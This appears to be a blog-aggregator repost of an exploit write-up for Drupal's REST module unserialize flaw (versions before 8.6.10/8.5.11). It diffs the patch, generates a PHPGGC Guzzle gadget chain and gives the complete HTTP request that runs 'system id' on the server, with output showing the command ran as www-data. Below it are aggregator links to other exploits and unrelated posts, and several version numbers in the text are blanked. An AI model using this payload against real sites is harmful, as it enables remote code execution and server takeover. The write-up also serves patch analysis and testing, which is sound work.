Analyzing the patch

By diffing Drupal 8.6. and 8.6., we can see that in the REST module, FieldItemNormalizer now uses a new trait, SerializedColumnNormalizerTrait. This trait provides the checkForSerializedStrings() method, which in short raises an exception if a string is provided for a value that is stored as a serialized string. This indicates the exploitation vector fairly clearly: through a REST request, the attacker needs to send a serialized property. This property will later be unserialize()d, thing that can easily be exploited using tools such as PHPGGC. Another modified file gives indications as to which property can be used: LinkItem now uses unserialize($values['options'], ['allowed_classes' => FALSE]); instead of the standard unserialize($values['options']);.

As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link.

Triggering the unserialize()

Having all these elements in mind, triggering an unserialize is fairly easy:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "<SERIALIZED_CONTENT>"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

Since Drupal  uses Guzzle, we can generate a payload using PHPGGC:

$ ./phpggc guzzle/rce1 system id --json

"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

We can now send the payload via GET:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

To which Drupal responds:

HTTP/1.1  OK

Link: <...>

X-Generator: Drupal  (https://www.drupal.org)

X-Drupal-Cache: MISS

Connection: close

Content-Type: application/hal+json

Content-Length: 

{...}uid=(www-data) gid=(www-data) groups=(www-data)

Note: Drupal caches responses: if you're in a testing environment, clear the cache. If not, try another node ID.

[EXP]Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution的更多相关文章

  1. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  2. [EXP]Microsoft Windows CONTACT - Remote Code Execution

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...

  3. [EXP]WordPress Core 5.0 - Remote Code Execution

    var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ...

  4. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  5. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  6. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  7. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  8. GTAC 2015将于11月10号和11号召开

    今年的GTAC注册已经结束,将会在11月10号和11号在Google马萨诸塞州剑桥办公室召开.大家可以关注https://developers.google.com/google-test-autom ...

  9. 【译】C++工程师需要掌握的10个C++11特性

    原文标题:Ten C++11 Features Every C++ Developer Should Use 原文作者:Marius Bancila 原文地址:codeproject 备注:非直译,带 ...

随机推荐

  1. MQ队列堵塞无法读取经验总结

    问题现象: 1号发生本地来帐队列无法读取消息的问题,导致来帐报文均无法正常处理. 原因分析: 应用系统没有修改或上包,昨天交易和消息读取还是一切正常,mbfe的状态也是正常,mq的状态正常,以上正常可 ...

  2. 中间件RabbitMQ之运维篇

    一.RabbtMQ简介        RabbitMQ的官方站: http:/://www.rabbitmq.com/        rabbitMQ是一个在AMQP协议标准基础上完整的,可服用的企业 ...

  3. 手机连得上WIFI,电脑连不上的情况

    可以搜到,密码也对,但就是连不上,这时候可能就是你的设置错了. 操作步骤以下: 右击我的电脑-->管理-->设备管理器-->网络适配器-->找到你wifi对应的那个名称(如果不 ...

  4. pythone函数基础(7)第三方模块学习

    一,time模块学习 import time # print(int(time.time()))#时间戳# res = time.strftime('%Y-%m-%d %H:%M:%S')#取当前格式 ...

  5. .net core 中使用ef 访问mysql

    1.参考文档说修改项目文件添加,就得这么做,不然会报错 <ItemGroup> <DotNetCliToolReference Include="Microsoft.Ent ...

  6. I/O dempo

    标准读取写入 package io_stream; import java.io.BufferedInputStream; import java.io.BufferedOutputStream; i ...

  7. 【慕课网实战】Spark Streaming实时流处理项目实战笔记二十一之铭文升级版

    铭文一级: DataV功能说明1)点击量分省排名/运营商访问占比 Spark SQL项目实战课程: 通过IP就能解析到省份.城市.运营商 2)浏览器访问占比/操作系统占比 Hadoop项目:userA ...

  8. Reading | 《TensorFlow:实战Google深度学习框架》

    目录 三.TensorFlow入门 1. TensorFlow计算模型--计算图 I. 计算图的概念 II. 计算图的使用 2.TensorFlow数据类型--张量 I. 张量的概念 II. 张量的使 ...

  9. Pattern Design - Strategy Pattern

    If you can disassemble code  and  you want to apply one method of an object in another object that t ...

  10. C程序编程规范一

    和身边一些学弟们接触发现他们的编程习惯不是太好,对一些基本的规范不重视,今天有时间写一些基本的规范给一些刚入门的新手们,高手可忽略. 首先做项目来说需要建立工程,一般需要几个到几百个上上千个C文件,这 ...